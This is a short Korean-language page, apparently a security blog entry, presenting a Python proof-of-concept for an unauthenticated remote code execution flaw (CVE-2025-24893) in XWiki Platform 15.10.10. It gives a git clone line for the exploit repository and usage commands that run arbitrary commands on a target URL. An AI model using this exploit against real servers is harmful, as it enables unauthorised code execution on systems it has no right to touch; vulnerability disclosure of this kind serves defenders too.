
PoC | XWiki Platform 15.10.10 - 원격 코드 실행
비인증 공격자가 사전 인증이나 접근 권한 없이 (Guest User) 원격으로 임의의 Groovy 코드를 실행할 수 있는 RCE(Remote Code Execution) 범주의 취약점입니다. 이 취약점을 악용하기 위한 Python 기반 PoC(Proof-Of-Concept)입니다.
git clone https://github.com/zs1n/CVE-2025-24893
python3 CVE-2025-24893.py -u <url> -c <command>
python3 CVE-2025-24893.py -u https://domain.com -c 'id'